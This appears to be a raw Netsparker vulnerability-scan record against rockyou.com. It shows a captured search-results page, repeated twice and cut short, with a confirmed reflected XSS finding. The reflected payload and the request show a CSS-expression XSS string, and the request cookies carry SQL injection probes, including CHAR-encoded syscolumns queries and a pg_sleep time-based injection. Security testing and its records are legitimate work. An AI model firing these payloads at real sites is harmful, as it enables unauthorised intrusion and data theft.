HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 23:00:40 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 23:00:39 GMT; path=/; domain=.rockyou.com,lastlogin=1303167640; expires=Wed, 27-Jul-2011 23:00:40 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 23:00:40 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=14492 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 5079
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
<link href="/css/browse.css?ver=6" rel="stylesheet" type="text/css"><link href="/css/search.css?ver=6" rel="stylesheet" type="text/css">
</HEAD>
<BODY class=""
style="background-image: url(/images/menu-bg.gif); background-repeat: repeat-x;"
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload=""
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="display:block;width:840px;height:68px;border:0px;position:relative;">
<a href="/index.php"><img src="/images/logo-menutop-rockyou.gif" alt=""></a>
<table cellpadding="1" cellspacing="0" style="position:absolute;top:0px;left:107px;"><tr>
<td style="font-size:15px"><a class="mainmenu" href="/choose_widget.php">Create</a> | </td>
<td style="font-size:15px"><a class="mainmenu" href="/my_stuff.php">My Stuff</a> | </td>
<td style="font-size:15px"><a class="mainmenu" href="/featuredartists.php">Browse</a></td>
</tr></table>
<img src="/images/index_tab.gif" style="position:absolute;top:0px;left:620px">
<div style="position:absolute;top:5px;left:630px;font-size:11px;font-family:arial;width:200px;text-align:center;">
<a href="http://www.rockyou.com/login/" style="color: white;">login / register</a> </div>
</div>
<div style="position:absolute;top:24;left:628;">
<form method="get" action="/search_main.php">
<table class="search" id="search_box"><tr><td>
<input type="text" name="s_tsearch" size=17 style="border:2px solid #6388c2"/></td>
<td><input type="submit" value="search" />
</td></tr></table> <input type="hidden" value="1" name="p" /></form>
</div>
<!-- TF 728x90 JScript NoAD code -->
<div style="width:850px;margin-bottom:10px;">
<div style='padding-left:60px;'>
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div>
</div>
<script>
function buttonHover(id) {
document.getElementById(id).style.backgroundColor = '#99aabb';
document.getElementById(id).style.color = '#ffffff';
document.getElementById(id).style.border = '1px solid #ffffff';
/*document.getElementById(id).style.borderRight = '1px solid #ffffff';*/
}
function buttonOut(id) {
document.getElementById(id).style.backgroundColor = '#E8EBF0';
document.getElementById(id).style.color = '#000000';
document.getElementById(id).style.border = '1px solid #99aabb';
}
/*onMouseOver="buttonHover(this.id);" onMouseOut="buttonOut(this.id);"*/
</script>
<div id="search_bar">
<ul id="menu">
<li id="selected">Slideshows</li>
<!--<li><a href='/search_people.php?q=\' stYle=x:expre/**/ssion(netsparker(9)) ns=\' &p=1'>People</a></li>!-->
</ul>
<div id="contents">
<form method='get'>
<table id="input_table">
<tr><td>
<input id="search_input" name="s_tsearch" type="text" value="\' stYle=x:expre/**/ssion(netsparker(9)) ns=\' " /></td>
<td><input id="search_button" value="Search" type="submit" /></td>
</tr></table>
</form>
</div>
</div>
<div id="search_res">
<table width='800' cellspacing=5 cellpadding=0 ><tr><td colspan='5'><tr><td colspan='1' align='left'><strong>1 - 20</strong></td>
<td colspan='3' align='center'><em class='curr_page'>Top Ranked</em> | <a href='?s_pindex=-20&s_sort=views&s_tsearch=' stYle=x:expre/**/ssion(netsparker(9)) ns=' '>Most Viewed</a> | <a href='?s_pindex=-20&s_sort=date&s_tsearch=' stYle=x:expre/**/ssion(netsparker(9)) ns=' '>Most Recent</a></td>
<td colspan='1' align='right'><em class='curr_page'>1</em><tr><td><br /><br /></td></tr></td></tr><td class='resultentrys' style='text-align:center;vertical-align:text-bottom;'><div class='imgwraps'><a href='/viewslideshow.php?instanceid=41826857&s_pindex=1&s_sort=rank&s_tsearch=' stYle=x:expre/**/ssion(netsparker(9)) ns=' '><img class='slidethumb' src='http://img156.rockyou.com/41/41826/41826857/41826857_6e20a7151161267112.JPG'></a></div><a href='/viewslideshow.php?instanceid=41826857&s_pindex=2&s_sort=rank&s_tsearch=' stYle=x:expre/**/ssion(netsparker(9)) ns=' '>TAHNIAH KOPRAL MUHD ...<!--<br />
<img alt='Play Slideshow!' src='/images/lang/en/pllay.jpg' border='1' />--></a><br />
Views: 500 <br /><br /><td class='resultentrys' style='text-align:center;vertical-align:text-bottom;'><div class='imgwraps'><a href='/viewslideshow.php?instanceid=46686943&s_pindex=2&s_sort=rank&s_tsearch=' stYle=x:expre/**/ssion(netsparker(9)) ns=' '><img class='slidethumb' src='http://img163.rockyou.com/46/46686/46686943/46686943_2a97e2f91165954728.jpg'></a></div><a href='/viewslideshow.php?instanceid=46686943&s_pindex=3&s_sort=rank&s_tsearch=' stYle=x:expre/**/ssion(netsparker(9)) ns=' '>[No Title]<!--<br />
<img alt='Play Slideshow!' src='/images/lang/en/pllay.jpg' border='1' />--></a><br />
Views: 145 <br /><br /><tr><td colspan='3' align='left'><strong>1 - 20</strong></td><td colspan='2' align='right'><em class='curr_page'>1</em></td></tr></table></div>
<div style='position: absolute; left: 850px; top: 0px; width: 160px;'>
<div style="border:1px solid #ccc;margin-top:70px;width:176px;height:236px;margin-bottom:10px;">
<div style="padding:8px;">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=SHOWMYGALLERY/aamsz=PREMIUM_MODULE2/AGE=/GENDER=/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=SHOWMYGALLERY/aamsz=PREMIUM_MODULE2/site=ROCKU/AGE=/GENDER=/" ' +
'width="160" height="220" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=SHOWMYGALLERY/aamsz=PREMIUM_MODULE2/site=ROCKU/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=SHOWMYGALLLERY/aamsz=PREMIUM_MODULE2/site=ROCKU/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div>
</div>
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/aamsz=PM3/AGE=/GENDER=/-->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/aamsz=PM3/AGE=/GENDER=/" ' +
'width="180" height="288" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/aamsz=PM3/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/aamsz=PM3/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
<br />
<div id="googleAdUnitIframe_1"></div>
<HR>
<script type="text/javascript">
var googleAdIframeTable = [ ['googleAdUnitIframe_1', 3],
];
var googleAdClient = "pub-3255760518790512";
var googleAdChannel = "";
var googleAdSearchQueryString = "s_tsearch";
var googleAdFrameborder = '0';
var googleAdColorDiv = 'FFFFFF';
var googleAdColorBg = 'FFFFFF';
var googleAdColorLink = '0000CC';
var googleAdColorVLink = '0000CC';
var googleAdColorALink = '0000CC';
var googleAdColorText = '000000';
var googleAdColorAltText = '008000';
// The following parameter is optional:
var googleAdAlternateAdUrl = "";
</script>
<scr..
Date: Mon, 18 Apr 2011 23:00:40 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 23:00:39 GMT; path=/; domain=.rockyou.com,lastlogin=1303167640; expires=Wed, 27-Jul-2011 23:00:40 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 23:00:40 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=14492 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 5079
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
function preloadImages() {
if (document.images) {
create_over = newImage("/images/create-over.png");
mystuff_over = newImage("/images/mystuff-over.png");
topshows_over = newImage("/images/topshows-over.png");
preloadFlag = true;
}
}
function Set_Cookie( name, value, expires)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires ) {
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
";domain=.rockyou.com";
}
function Get_Cookie( name ) {
var start = document.cookie.indexOf( name + "=" );
var len = start + name.length + 1;
if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) {
return null;
}
if ( start == -1 ) return null;
var end = document.cookie.indexOf( ";", len );
if ( end == -1 ) end = document.cookie.length;
return unescape( document.cookie.substring( len, end ) );
}
function Delete_Cookie( name, path) {
if ( Get_Cookie( name ) ) document.cookie = name + "=;domain=.rockyou.com;expires=Thu, 01-Jan-1970 00:00:01 GMT";
}
function showHelp(name)
{
urchinTracker ('/help/'+name);
newwindow= window.open('/popuphelp.php?name='+name,'helppage','toolbar=no, status=no,height=500, width=300,scrollbars=1');
if (window.focus) newwindow.focus();
}
function toggle_frontpage_sound() {
var frontpage_music = document.getElementById("frontpage_music");
if (frontpage_music) frontpage_music.blur();
// Toggle text
var music_text_span = document.getElementById("music_text_span");
if (music_text_span)
music_text_span.innerHTML = (music_text_span.innerHTML == 'MUTE') ? 'LISTEN' : 'MUTE';
// Toggle speaker image
var speaker_button = document.getElementById("speaker_button");
if (speaker_button)
speaker_button.src = (speaker_button.src == "http://dev2.rockyou.com/images/bling3/speaker.png") ?
"http://dev2.rockyou.com/images/bling3/speaker-on.png" : "http://dev2.rockyou.com/images/bling3/speaker.png";
// Toggle sound
var showcase_slide_embed = document.getElementById("showcase_slide_embed");
if (showcase_slide_embed) {
if (showcase_slide_embed.innerHTML.indexOf('nosound=false') != -1) {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=false/, 'nosound=true');
Set_Cookie('frontpage_music_disabled', '1', 1);
}
else {
showcase_slide_embed.innerHTML = showcase_slide_embed.innerHTML.replace(/nosound=true/, 'nosound=false');
Set_Cookie('frontpage_music_disabled', '0', 1);
}
}
}
function toggle_frontpage_music_icon() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("showcase_slide_embed");
if (frontpage_music) {
if (frontpage_music.innerHTML.indexOf("turn-on") >= 0) {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-on/, 'turn-off')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = frontpage_music.innerHTML.replace(/turn-off/, 'turn-on')
if (slide_container) {
var front_embed = slide_container.innerHTML;
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
frontpage_music.blur();
}
function toggle_frontpage_music_text() {
var frontpage_music = document.getElementById("frontpage_music");
var slide_container = document.getElementById("slide-container");
if (frontpage_music) {
if (frontpage_music.innerHTML == "turn music on") {
frontpage_music.innerHTML = "turn music off";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=true/, 'nosound=false');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=false" ');
}
}
Set_Cookie('frontpage_music_disabled', '0', 1);
} else {
frontpage_music.innerHTML = "turn music on";
if (slide_container) {
var front_embed = slide_container.innerHTML;
if (front_embed.indexOf("nosound=") > 0) {
slide_container.innerHTML = front_embed.replace(/nosound=false/, 'nosound=true');
} else {
slide_container.innerHTML = front_embed.replace(/<embed /, '<embed FlashVars="nosound=true" ');
}
}
Set_Cookie('frontpage_music_disabled', '1', 1);
}
}
}
// -->
</script>
<script src="/js/common.js" type="text/javascript"></script><link href="http://cdn.rockyou.com/apps/mainsite/css/style.css" rel="stylesheet" type="text/css">
<link href="/css/browse.css?ver=6" rel="stylesheet" type="text/css"><link href="/css/search.css?ver=6" rel="stylesheet" type="text/css">
</HEAD>
<BODY class=""
style="background-image: url(/images/menu-bg.gif); background-repeat: repeat-x;"
LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0
onload=""
onunload=""
>
<!-- Comscore tracking. Comscore tracks every time a resource on rockyou is loaded with these params. -->
<img src="http://apps.rockyou.com/dot.gif?CXNID=1000017.0NXC">
<!-- TF 728x90 JScript NoAD code -->
<div style="display:block;width:840px;height:68px;border:0px;position:relative;">
<a href="/index.php"><img src="/images/logo-menutop-rockyou.gif" alt=""></a>
<table cellpadding="1" cellspacing="0" style="position:absolute;top:0px;left:107px;"><tr>
<td style="font-size:15px"><a class="mainmenu" href="/choose_widget.php">Create</a> | </td>
<td style="font-size:15px"><a class="mainmenu" href="/my_stuff.php">My Stuff</a> | </td>
<td style="font-size:15px"><a class="mainmenu" href="/featuredartists.php">Browse</a></td>
</tr></table>
<img src="/images/index_tab.gif" style="position:absolute;top:0px;left:620px">
<div style="position:absolute;top:5px;left:630px;font-size:11px;font-family:arial;width:200px;text-align:center;">
<a href="http://www.rockyou.com/login/" style="color: white;">login / register</a> </div>
</div>
<div style="position:absolute;top:24;left:628;">
<form method="get" action="/search_main.php">
<table class="search" id="search_box"><tr><td>
<input type="text" name="s_tsearch" size=17 style="border:2px solid #6388c2"/></td>
<td><input type="submit" value="search" />
</td></tr></table> <input type="hidden" value="1" name="p" /></form>
</div>
<!-- TF 728x90 JScript NoAD code -->
<div style="width:850px;margin-bottom:10px;">
<div style='padding-left:60px;'>
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div>
</div>
<script>
function buttonHover(id) {
document.getElementById(id).style.backgroundColor = '#99aabb';
document.getElementById(id).style.color = '#ffffff';
document.getElementById(id).style.border = '1px solid #ffffff';
/*document.getElementById(id).style.borderRight = '1px solid #ffffff';*/
}
function buttonOut(id) {
document.getElementById(id).style.backgroundColor = '#E8EBF0';
document.getElementById(id).style.color = '#000000';
document.getElementById(id).style.border = '1px solid #99aabb';
}
/*onMouseOver="buttonHover(this.id);" onMouseOut="buttonOut(this.id);"*/
</script>
<div id="search_bar">
<ul id="menu">
<li id="selected">Slideshows</li>
<!--<li><a href='/search_people.php?q=\' stYle=x:expre/**/ssion(netsparker(9)) ns=\' &p=1'>People</a></li>!-->
</ul>
<div id="contents">
<form method='get'>
<table id="input_table">
<tr><td>
<input id="search_input" name="s_tsearch" type="text" value="\' stYle=x:expre/**/ssion(netsparker(9)) ns=\' " /></td>
<td><input id="search_button" value="Search" type="submit" /></td>
</tr></table>
</form>
</div>
</div>
<div id="search_res">
<table width='800' cellspacing=5 cellpadding=0 ><tr><td colspan='5'><tr><td colspan='1' align='left'><strong>1 - 20</strong></td>
<td colspan='3' align='center'><em class='curr_page'>Top Ranked</em> | <a href='?s_pindex=-20&s_sort=views&s_tsearch=' stYle=x:expre/**/ssion(netsparker(9)) ns=' '>Most Viewed</a> | <a href='?s_pindex=-20&s_sort=date&s_tsearch=' stYle=x:expre/**/ssion(netsparker(9)) ns=' '>Most Recent</a></td>
<td colspan='1' align='right'><em class='curr_page'>1</em><tr><td><br /><br /></td></tr></td></tr><td class='resultentrys' style='text-align:center;vertical-align:text-bottom;'><div class='imgwraps'><a href='/viewslideshow.php?instanceid=41826857&s_pindex=1&s_sort=rank&s_tsearch=' stYle=x:expre/**/ssion(netsparker(9)) ns=' '><img class='slidethumb' src='http://img156.rockyou.com/41/41826/41826857/41826857_6e20a7151161267112.JPG'></a></div><a href='/viewslideshow.php?instanceid=41826857&s_pindex=2&s_sort=rank&s_tsearch=' stYle=x:expre/**/ssion(netsparker(9)) ns=' '>TAHNIAH KOPRAL MUHD ...<!--<br />
<img alt='Play Slideshow!' src='/images/lang/en/pllay.jpg' border='1' />--></a><br />
Views: 500 <br /><br /><td class='resultentrys' style='text-align:center;vertical-align:text-bottom;'><div class='imgwraps'><a href='/viewslideshow.php?instanceid=46686943&s_pindex=2&s_sort=rank&s_tsearch=' stYle=x:expre/**/ssion(netsparker(9)) ns=' '><img class='slidethumb' src='http://img163.rockyou.com/46/46686/46686943/46686943_2a97e2f91165954728.jpg'></a></div><a href='/viewslideshow.php?instanceid=46686943&s_pindex=3&s_sort=rank&s_tsearch=' stYle=x:expre/**/ssion(netsparker(9)) ns=' '>[No Title]<!--<br />
<img alt='Play Slideshow!' src='/images/lang/en/pllay.jpg' border='1' />--></a><br />
Views: 145 <br /><br /><tr><td colspan='3' align='left'><strong>1 - 20</strong></td><td colspan='2' align='right'><em class='curr_page'>1</em></td></tr></table></div>
<div style='position: absolute; left: 850px; top: 0px; width: 160px;'>
<div style="border:1px solid #ccc;margin-top:70px;width:176px;height:236px;margin-bottom:10px;">
<div style="padding:8px;">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=SHOWMYGALLERY/aamsz=PREMIUM_MODULE2/AGE=/GENDER=/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=SHOWMYGALLERY/aamsz=PREMIUM_MODULE2/site=ROCKU/AGE=/GENDER=/" ' +
'width="160" height="220" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=SHOWMYGALLERY/aamsz=PREMIUM_MODULE2/site=ROCKU/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=SHOWMYGALLLERY/aamsz=PREMIUM_MODULE2/site=ROCKU/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div>
</div>
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/aamsz=PM3/AGE=/GENDER=/-->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/aamsz=PM3/AGE=/GENDER=/" ' +
'width="180" height="288" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/aamsz=PM3/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/aamsz=PM3/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
<br />
<div id="googleAdUnitIframe_1"></div>
<HR>
<script type="text/javascript">
var googleAdIframeTable = [ ['googleAdUnitIframe_1', 3],
];
var googleAdClient = "pub-3255760518790512";
var googleAdChannel = "";
var googleAdSearchQueryString = "s_tsearch";
var googleAdFrameborder = '0';
var googleAdColorDiv = 'FFFFFF';
var googleAdColorBg = 'FFFFFF';
var googleAdColorLink = '0000CC';
var googleAdColorVLink = '0000CC';
var googleAdColorALink = '0000CC';
var googleAdColorText = '000000';
var googleAdColorAltText = '008000';
// The following parameter is optional:
var googleAdAlternateAdUrl = "";
</script>
<scr..
|
- /search_main.php
/search_main.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| lang | GET | en |
| s_tsearch | GET | ' stYle=x:expre/**/ssion(alert(9)) ns=' |
| p | GET | 1 |
Request
GET /search_main.php?lang=en&s_tsearch='%20stYle=x:expre/**/ssion(netsparker(9))%20ns='%20&p=1 HTTP/1.1
Referer: http://www.rockyou.com/search_main.php?s_tsearch=&p=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=9eea1s66tbmof79ujd25v61ml3; lang=en; lastlogin=1303167683; ctid=3; istack=3%7Cwww202.rockyou.com%7C%7C%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29%7Cwww202.rockyou.com%7C%7C%27%2B+%28select+convert%28int%2CCHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29+FROM+syscolumns%29+%2B%27%7Cwww202.rockyou.com%7C%7Cconvert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29%7Cwww202.rockyou.com%7C%7C%27%2B+convert%28int%2C%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%29+%2B%27%7Cwww202.rockyou.com%7C%7C%27AND+1%3D%28CHAR%2895%29%2BCHAR%2833%29%2BCHAR%2864%29%2BCHAR%2850%29%2BCHAR%28100%29%2BCHAR%28105%29%2BCHAR%28108%29%2BCHAR%28101%29%2BCHAR%28109%29%2BCHAR%28109%29%2BCHAR%2897%29%29%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7CNSFTW%7Cwww202.rockyou.com%7C%7C%27%2BNSFTW%2B%27%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com; pubtype=facebook; ultype=facebook; referralid=1%29%29%3BSELECT+pg_sleep%2825%29--; sns_type=rockyou.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://www.rockyou.com/search_main.php?s_tsearch=&p=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
